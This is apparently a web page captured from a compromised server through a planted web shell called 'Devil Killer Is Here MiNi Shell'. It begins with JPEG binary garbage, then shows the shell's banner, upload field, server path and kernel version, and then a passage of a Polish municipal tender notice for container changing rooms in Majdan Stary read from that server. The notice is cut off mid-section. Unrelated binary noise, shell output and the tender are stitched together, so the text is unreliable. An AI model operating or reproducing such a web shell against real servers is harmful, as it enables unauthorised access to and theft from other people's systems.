JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231027/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20231027/0046579201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa szatni kontenerowych przy boisku w Majdanie Starym </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KSIĘŻPOL</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950369095</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Biłgorajska 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Księżpol</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-415</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">cuw@ksiezpol.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ugksiezpol.bip.lubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa szatni kontenerowych przy boisku w Majdanie Starym </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0d89ad35-74a0-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00465792</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00012437/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.15 Budowa szatni kontenerowych przy boisku w Mjadanie Starym</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pzp.ksiezpol.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://pzp.ksiezpol.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami:<br/>1) W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu: Platformy<br/>Zamówień Publicznych Zamawiającego : https://pzp.ksiezpol.pl<br/>2) Korzystanie z Platformy jest bezpłatne.<br/>3) Instrukcja Użytkownika - korzystania z Platformy Zamówień Publicznych znajduje się na Portalu, w zakładce „Pomoc” pod<br/>adresem https://pzp.ksiezpol.pl/#/help<br/>4) Ogólne zasady korzystania z Platformy:<br/>a) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie<br/>https://pzp.ksiezpol.pl/#/authentication/login<br/>b) Wykonawca aby przystąpić do postępowania musi założyć konto na Platformie https://pzp.ksiezpol.pl//#/authentication/register<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego; podaje adres e-mail, otrzymuje link aktywacyjny, a następnie ustanawia hasło;<br/>5) Zamawiający, zgodnie z art. 67 ustawy Pzp określa następujące wymagania techniczne i organizacyjne sporządzania, wysyłania i<br/>odbierania korespondencji elektronicznej przy wykorzystaniu Platformy Zakupowej, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 10, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>c) zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji obsługująca TLS 1.2 z wyjątkiem Internet Explorer;<br/>d) włączona obsługa JavaScript;<br/>e) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.;<br/>6) Zamawiający, zgodnie z §11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452) podaje następujące<br/>informacje na temat specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych:<br/>a) dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100 MB w formatach: .doc, .pdf, .zip, .docx, .xls, .xlsx, .rar, .7zip, .jpg, .jpeg, .png, .txt, .tiff .xades, .sig,<br/>b) informacje na temat kodowania i czasu odbioru danych: - plik załączony przez Wykonawcę na Platformie Zamówień Publicznych<br/>Zamawiającego i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku<br/>dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert;<br/>7) Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu platformy<br/>Microsoft Azure, który jest synchronizowany ze znacznikiem czasu UTC.<br/>2. Ofertę, oświadczenia i dokumenty muszą zostać podpisane przez Wykonawcę przy użyciu kwalifikowanego podpisu<br/>elektronicznego, podpisu osobistego lub podpisu zaufanego .<br/>1) zalecenia odnoście kwalifikowanego podpisu elektronicznego:<br/>a) dla dokumentów w formacie „pdf” zaleca się podpis w formacie PAdES;<br/>b) dla dokumentów w formacie innym niż „pdf” zaleca się podpisywać formatem XAdES;<br/>2) zalecenia odnośnie podpisu osobistego:<br/>a) dla dokumentów w formacie „pdf” lub „xml” zaleca się podpis wewnętrzny (otoczony);<br/>b) dokumenty w formie innej niż „pdf” zaleca się podpisywać podpisem zewnętrznym lub otaczającym;<br/>3) zalecenia odnośnie podpisu zaufanego:<br/>a) wielkość dokumentów nie może przekroczyć 10MB, dostępny format podpisu „xml”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 3 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1.	Administratorem Pani/Pana danych osobowych jest Wójt Gminy Księżpol ul. Biłgorajska 12, 23-415 Księżpol tel. 84 6877420; fax 84 6877432; e-mail info@ksiezpol.pl;<br/>2.	W sprawach związanych z przetwarzaniem danych osobowych można kontaktować się z Inspektorem ochrony danych osobowych: tel. 604521364; mail: biuro@myszkowiak.pl <br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie przetargu podstawowego oraz w celu archiwizacji i przeprowadzanych kontroli;<br/>4.	Podstawę prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>5.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18-19 oraz 74 -76 ustawy Pzp.<br/>6.	Pani/Pana dane osobowe będą przechowane, zgodnie z art. 78 ust. 1 Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, oraz przez okres wynikający z przepisów szczególnych dotyczących archiwizacji. Okresy te dotyczą również Wykonawców, którzy złożyli oferty i nie zostały one uznane, jako najkorzystniejsze (nie zawarto z tymi Wykonawcami umowy).<br/>7.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8.	Posiada Pani/Pan prawo:<br/>1)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>3)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>4)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9.	Nie przysługuje Pani/Panu:<br/>1)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUW.251.11.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia budowa szatni kontenerowych z sanitariatami przy boisku sztucznym w Majdanie Starym wraz<br/>z infrastrukturą na działce nr ewid.: 1288. Zakres rzeczowy obejmuje roboty konieczne do realizacji inwestycji określone w<br/>dokumentacji stanowiącej podstawę zakresu robót, w szczególności:<br/>1) roboty budowlane, dostawę i montaż wyposażenia szatni kontenerowych przy boisku w Majdanie Starym z elementami<br/>małej architektury oraz infrastrukturą techniczną, w szczególności:<br/>a) roboty pomiarowe i ziemne,<br/>b) przygotowanie terenu pod inwestycję,<br/>c) wykonanie wewnętrznych instalacji w gruncie w celu podłączenia projektowanych kontenerów do mediów. Instalacje:<br/>wodociągowa, kanalizacji sanitarnej z bezodpływowym zbiornikiem na nieczystości o poj. 10m3, instalacja<br/>elektroenergetyczna,<br/>d) wykonanie konstrukcji pod posadowienie kontenerów,<br/>e) wykonanie nawierzchni utwardzonych (m.in. ciągi pieszo-jezdne, chodniki, opaski wokół bud.) o powierzchni całkowitej<br/>276,52m2,<br/>f) dostawa i montaż kontenerów wraz z wyposażeniem oraz instalacjami wewnętrznymi: 4 szt. kontenerów o wymiarach<br/>2,5x6x2,8m, 1 szt. kontenera o wymiarach 2,5x3x2,8m oraz 3szt. kontenerów zadaszeniowych o wymiarach 2,5x3x2,8m wraz z projektem technicznym kontenerów<br/>g) dostawa i montaż 5 szt. pergol stalowych na pnącza wraz z nasadzeniem pnączy,<br/>h) dostawa i montaż elementów małej architektury: 6 szt. stojaków rowerowych rurowych dwustronnych,<br/>i) uporządkowanie terenu z obsianiem trawą.<br/>2) opracowanie dokumentacji powykonawczej wraz z inwentaryzacją geodezyjną – w wersji papierowej oraz w wersji<br/>elektronicznej.<br/>3) Opis przedmiotu zamówienia zawiera załącznik nr 10 do SWZ.<br/>4) Szczegółowy zakres prac (Opis Przedmiotu Zamówienia) został zawarty w dokumentacji projektowej obejmującej Projekt<br/>zagospodarowania działki, Projekt architektoniczo-budowlany, Specyfikacji Technicznej Wykonania i Odbioru Robót<br/>Budowlanych, Przedmiarach robót uzupełniających dokumentację stanowiących załączniki do SWZ. W kalkulacji ceny oferty<br/>wykonawca winien uwzględnić wszystkie wymagania i warunki wymagane do prawidłowego wykonania przedmiotu<br/>zamówienia;<br/>5) W ramach zamówienia Wykonawca zobowiązany jest również do:<br/>a) organizacji i zagospodarowania zaplecza budowy;<br/>b) zapewnienia bieżącej obsługi geodezyjnej przez uprawnione służby geodezyjne, wykonanie dokumentacji<br/>powykonawczej, łącznie z dokumentacją geodezyjną (inwentaryzacją powykonawczą) wszystkich prac, zatwierdzoną przez<br/>odpowiedni, z uwagi na lokalizację robót Urząd Geodezji i Kartografii;<br/>c) opracowanie planu bezpieczeństwa i ochrony zdrowia o ile jest wymagany;<br/>d) oznakowanie terenu budowy;<br/>e) w przypadku zniszczeń lub uszkodzeń podczas prowadzenia robót - naprawienie ich i doprowadzenie do stanu<br/>pierwotnego;<br/>f) zapewnienie dozoru, a także właściwych warunków bezpieczeństwa i higieny pracy;<br/>g) utrzymanie terenu budowy w stanie wolnym od przeszkód komunikacyjnych oraz usuwanie na bieżąco zbędnych<br/>materiałów, odpadów i śmieci;<br/>h) udzielenia rękojmi za wady fizyczne i prawne oraz gwarancji jakości na wykonane roboty budowlane i wbudowane<br/>urządzenia na okres min. 36 miesięcy, licząc od dnia następnego po dokonaniu odbioru końcowego zadania (niezależnie od<br/>wystawianych gwarancji przez producentów urządzeń);<br/>i) uczestniczenie w przeglądach gwarancyjnych zgłoszonych przez zamawiającego (w okresie objętym gwarancją/rękojmią);<br/>j) po zakończeniu robót należy doprowadzić teren budowy do stanu pierwotnego, wykonać demontaż obiektów<br/>tymczasowych, uporządkować teren oraz przekazać go zamawiającemu najpóźniej do dnia odbioru końcowego.<br/>2. Rozwiązania równoważne.<br/>1) W przypadku użycia w SWZ lub załącznikach tj. wszędzie tam gdzie w dokumentacji projektowej oraz innych<br/>dokumentach wykonania zamówienia i odbioru robót budowlanych w odniesieniu do norm o których mowa w art. 101 ust. 1<br/>pkt 2 oraz ust. 3 ustawy Pzp zamawiający dopuszcza rozwiązania równoważne z opisywanym a odniesieniu takiemu<br/>towarzyszą wyrazy &#34;lub równoważne&#34;.<br/>2) W przypadku, gdy w SWZ lub załącznikach zostały użyte znaki towarowe, oznacza to, że są podane przykładowo i<br/>określają jedynie minimalne oczekiwane parametry jakościowe oraz wymagany standard i ma na celu doprecyzowanie<br/>poziomu oczekiwań zamawiającego w stosunku do określonego rozwiązania. Zamawiający przy opisie przedmiotu<br/>zamówienia wskazując konkretne oznaczenie lub konkretny produkt dopuszcza jednocześnie produkty równoważne o<br/>parametrach jakościowych i cechach użytkowych co najmniej na poziomie parametrów wskazanego produktu, uznając tym<br/>samym każdy produkt o wskazanych parametrach lub lepszych. Wykonawca może zastosować materiały lub urządzenia<br/>równoważne, lecz o parametrach technicznych i jakościowych na poziomie parametrów wskazanego produktu lub lepszych,<br/>których zastosowanie w żaden sposób nie wpłynie negatywnie na prawidłowe funkcjonowanie rozwiązań przyjętych w<br/>dokumentacji projektowej. Materiały i urządzenia przed wybudowaniem będą przedstawione zamawiającemu do akceptacji z<br/>określeniem równoważności.<br/>3) Wszędzie tam gdzie przedmiot zamówienia jest opisany poprzez wskazanie znaków towarowych, pochodzenia, źródła<br/>lub szczególnego procesu, który charakteryzuje produkty, materiały, urządzenia lub rozwiązania lub odniesienie do norm,<br/>europejskich ocen technicznych, aprobat, innych dokumentów zamawiający dopuszcza zastosowanie przez wykonawcę<br/>produktów, materiałów, urządzeń lub rozwiązań równoważnych w stosunku do opisanych w dokumentacji projektowej lub<br/>specyfikacji technicznej pod warunkiem, że będą one posiadały co najmniej takie same lub lepsze parametry techniczne i<br/>funkcjonalne i nie obniżą określonych w dokumentacji projektowej standardów oraz będą posiadały wymagane odpowiednie<br/>atesty, certyfikaty lub dopuszczenia do stosowania oraz zapewnią wykonanie zamówienia zgodnie z wymaganiami<br/>zamawiającego określonymi w projekcie i SWZ .Materiały i urządzenia przed wybudowaniem będą przedstawione<br/>zamawiającemu do akceptacji z określeniem równoważności.<br/>3. Określenie wymagań dotyczących zatrudniania przez wykonawcę lub podwykonawcę osób na podstawie stosunku pracy.<br/>1) Zamawiający wymaga zatrudnienia dla obu części przez wykonawcę i podwykonawcę na podstawie stosunku pracy osób<br/>wykonujących wskazane przez zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności<br/>polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (t.j. Dz. U.<br/>z 2020 r., poz. 1320) wskazane poniżej czynności w zakresie:<br/>a) wykonywaniu robót przygotowawczych i ziemnych;<br/>b) profilowaniu i zagęszczanie podłoża;<br/>c) wykonywaniu prac brukarskich, i betoniarskich;<br/>d) montaż gotowych elementów;<br/>e) obsługa maszyn, urządzeń i sprzętu budowlanego;<br/>f) pracach wykończeniowych;<br/>g) transportem; h) innych prac wykonywanych fizycznie w ramach realizacji przedmiotu zamówienia jak również za pomocą maszyn i<br/>urządzeń budowlanych nie wymienionych powyżej.<br/>2) Sposób weryfikacji zatrudnienia osób oraz uprawnienia zamawiającego w zakresie kontroli spełniania przez wykonawcę<br/>wymagań związanych z zatrudnianiem tych osób oraz sankcji z tytułu niespełnienia tych wymagań zostały określone we<br/>wzorze umowy stanowiącej załącznik nr 9 do SWZ.<br/>3) Zamawiający nie określa innych wymagań w zakresie zatrudnienia, o których mowa w art. 96 ust. 2 pkt 2 ustawy Pzp.<br/>4. Zamawiający nie przewiduje przeprowadzenia wizji lokalnej oraz sprawdzenia przez wykonawcę dokumentów<br/>niezbędnych do realizacji zamówienia dostępnych na miejscu u zamawiającego.<br/>5. Zgodnie z art. 100 ust. 1 Zamawiający wymaga aby Wykonawca podczas prac budowlanych uwzględnił dostępność<br/>wykonanej inwestycji dla wszystkich użytkowników w tym osób niepełnosprawnych w zakresie spadków oraz ukształtowania<br/>przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112720-8 - Roboty w zakresie kształtowania terenów sportowych i rekreacyjnych</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena 60%, okres gwarancji jakościowej 40%. 2. Zamawiający dokona oceny ofert przyznając punkty w<br/>ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakościowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy 